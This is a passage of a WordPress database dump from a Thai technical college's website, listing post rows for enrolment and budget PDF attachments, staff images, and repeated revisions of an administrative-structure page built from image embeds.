(1442, 3, '2018-02-28 15:23:18', '2018-02-28 08:23:18', '', 'ขั้นตอนการสมัครเรียน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b8%95%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2018-02-28 15:23:18', '2018-02-28 08:23:18', '', 1441, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ขั้นตอนการสมัครเรียน.pdf', 0, 'attachment', 'application/pdf', 0),
(1443, 3, '2018-02-28 15:23:39', '2018-02-28 08:23:39', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ขั้นตอนการสมัครเรียน ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '1441-revision-v1', '', '', '2018-02-28 15:23:39', '2018-02-28 08:23:39', '', 1441, 'http://www.technicrayong.ac.th/1441-revision-v1/', 0, 'revision', '', 0),
(1444, 3, '2018-02-28 15:28:35', '2018-02-28 08:28:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\n\n ', 'ขั้นตอนการสมัครเรียน ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '1441-autosave-v1', '', '', '2018-02-28 15:28:35', '2018-02-28 08:28:35', '', 1441, 'http://www.technicrayong.ac.th/1441-autosave-v1/', 0, 'revision', '', 0),
(1445, 3, '2018-02-28 16:15:11', '2018-02-28 09:15:11', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%A3%E0%B8%B1%E0%B8%9A-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%88%E0%B9%88%E0%B8%B2%E0%B8%A2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B8%88%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%80%E0%B8%87%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลงบประมาณ ปีการศึกษา 2561', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%9361', '', '', '2018-02-28 16:15:11', '2018-02-28 09:15:11', '', 0, 'http://www.technicrayong.ac.th/?page_id=1445', 0, 'page', '', 0),
(1446, 3, '2018-02-28 16:14:45', '2018-02-28 09:14:45', '', 'ประมาณการรายรับ-รายจ่าย 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%88%e0%b9%88%e0%b8%b2%e0%b8%a2', '', '', '2018-02-28 16:14:45', '2018-02-28 09:14:45', '', 1445, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ประมาณการรายรับ-รายจ่าย-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1447, 3, '2018-02-28 16:14:49', '2018-02-28 09:14:49', '', 'แผนการใช้จ่ายเงินตามแผนปฏิบัติการ 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%8a%e0%b9%89%e0%b8%88%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b9%81%e0%b8%9c', '', '', '2018-02-28 16:14:49', '2018-02-28 09:14:49', '', 1445, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนการใช้จ่ายเงินตามแผนปฏิบัติการ-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1448, 3, '2018-02-28 16:15:11', '2018-02-28 09:15:11', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%A3%E0%B8%B1%E0%B8%9A-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%88%E0%B9%88%E0%B8%B2%E0%B8%A2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B8%88%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%80%E0%B8%87%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลงบประมาณ ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '1445-revision-v1', '', '', '2018-02-28 16:15:11', '2018-02-28 09:15:11', '', 1445, 'http://www.technicrayong.ac.th/1445-revision-v1/', 0, 'revision', '', 0),
(1451, 3, '2018-03-05 10:57:45', '2018-03-05 03:57:45', '<img class=\"alignnone size-full wp-image-10931\" src=\"/wp-content/uploads/2020/12/1-2.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10932\" src=\"/wp-content/uploads/2020/12/2-2.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10933\" src=\"/wp-content/uploads/2020/12/3-1.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10934\" src=\"/wp-content/uploads/2020/12/4-1.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10935\" src=\"/wp-content/uploads/2020/12/5.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10936\" src=\"/wp-content/uploads/2020/12/6.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10938\" src=\"/wp-content/uploads/2020/12/7.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10939\" src=\"/wp-content/uploads/2020/12/8.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10940\" src=\"/wp-content/uploads/2020/12/9.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10941\" src=\"/wp-content/uploads/2020/12/10.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10942\" src=\"/wp-content/uploads/2020/12/11.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10943\" src=\"/wp-content/uploads/2020/12/12.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10944\" src=\"/wp-content/uploads/2020/12/13.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10945\" src=\"/wp-content/uploads/2020/12/14.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10946\" src=\"/wp-content/uploads/2020/12/15.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10947\" src=\"/wp-content/uploads/2020/12/16.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10948\" src=\"/wp-content/uploads/2020/12/17.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10949\" src=\"/wp-content/uploads/2020/12/18.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10950\" src=\"/wp-content/uploads/2020/12/19.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10951\" src=\"/wp-content/uploads/2020/12/20.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1', '', '', '2021-11-08 10:23:47', '2021-11-08 03:23:47', '', 0, 'http://www.technicrayong.ac.th/?page_id=1451', 0, 'page', '', 0),
(1452, 3, '2018-03-05 10:08:04', '2018-03-05 03:08:04', '', 'นายกิตติพงค์ อุตตมะเวทิน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%b4%e0%b8%95%e0%b8%95%e0%b8%b4%e0%b8%9e%e0%b8%87%e0%b8%84%e0%b9%8c-%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%95%e0%b8%a1%e0%b8%b0%e0%b9%80%e0%b8%a7%e0%b8%97%e0%b8%b4', '', '', '2018-03-05 10:08:04', '2018-03-05 03:08:04', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg', 0, 'attachment', 'image/jpeg', 0),
(1454, 3, '2018-03-05 10:23:12', '2018-03-05 03:23:12', '', '5-3-2561 10-23-29', '', 'inherit', 'closed', 'closed', '', '5-3-2561-10-23-29', '', '', '2018-03-05 10:23:12', '2018-03-05 03:23:12', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(1455, 3, '2018-03-05 10:24:04', '2018-03-05 03:24:04', '<img class=\"aligncenter size-full wp-image-1454\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1452\" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน-300x83.jpg\" alt=\"\" width=\"300\" height=\"83\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 10:24:04', '2018-03-05 03:24:04', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1456, 3, '2018-03-05 10:25:25', '2018-03-05 03:25:25', '', 'นางรุจิรดานันท์ พันกาฬสินธุ์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%a3%e0%b8%b8%e0%b8%88%e0%b8%b4%e0%b8%a3%e0%b8%94%e0%b8%b2%e0%b8%99%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b9%8c-%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%ac%e0%b8%aa', '', '', '2018-03-05 10:25:25', '2018-03-05 03:25:25', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg', 0, 'attachment', 'image/jpeg', 0),
(1463, 3, '2018-03-05 10:57:45', '2018-03-05 03:57:45', '<img class=\"aligncenter size-full wp-image-1454\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1452\" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน-300x83.jpg\" alt=\"\" width=\"300\" height=\"83\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-medium wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์-300x84.jpg\" alt=\"\" width=\"300\" height=\"84\" /><img class=\"aligncenter wp-image-1462 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"397\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 10:57:45', '2018-03-05 03:57:45', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1465, 3, '2018-03-05 10:59:57', '2018-03-05 03:59:57', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1462 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"397\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 10:59:57', '2018-03-05 03:59:57', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1467, 3, '2018-03-05 12:10:13', '2018-03-05 05:10:13', '', '5-3-2561 11-04-59', '', 'inherit', 'closed', 'closed', '', '5-3-2561-11-04-59', '', '', '2018-03-05 12:10:13', '2018-03-05 05:10:13', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg', 0, 'attachment', 'image/jpeg', 0),
(1469, 3, '2018-03-05 12:23:41', '2018-03-05 05:23:41', '', '5-3-2561 12-25-12', '', 'inherit', 'closed', 'closed', '', '5-3-2561-12-25-12', '', '', '2018-03-05 12:23:41', '2018-03-05 05:23:41', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(1470, 3, '2018-03-05 12:24:31', '2018-03-05 05:24:31', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 12:24:31', '2018-03-05 05:24:31', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1471, 3, '2018-03-05 12:25:31', '2018-03-05 05:25:31', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 12:25:31', '2018-03-05 05:25:31', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1473, 3, '2018-03-05 12:33:00', '2018-03-05 05:33:00', '', '5-3-2561 12-34-40', '', 'inherit', 'closed', 'closed', '', '5-3-2561-12-34-40', '', '', '2018-03-05 12:33:00', '2018-03-05 05:33:00', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg', 0, 'attachment', 'image/jpeg', 0),
(1474, 3, '2018-03-05 12:35:28', '2018-03-05 05:35:28', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 12:35:28', '2018-03-05 05:35:28', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1476, 3, '2018-03-05 12:44:06', '2018-03-05 05:44:06', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 12:44:06', '2018-03-05 05:44:06', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1478, 3, '2018-03-05 12:50:25', '2018-03-05 05:50:25', '', '5-3-2561 12-52-08', '', 'inherit', 'closed', 'closed', '', '5-3-2561-12-52-08', '', '', '2018-03-05 12:50:25', '2018-03-05 05:50:25', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(1479, 3, '2018-03-05 12:51:28', '2018-03-05 05:51:28', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 12:51:28', '2018-03-05 05:51:28', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1481, 3, '2018-03-05 13:22:30', '2018-03-05 06:22:30', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" 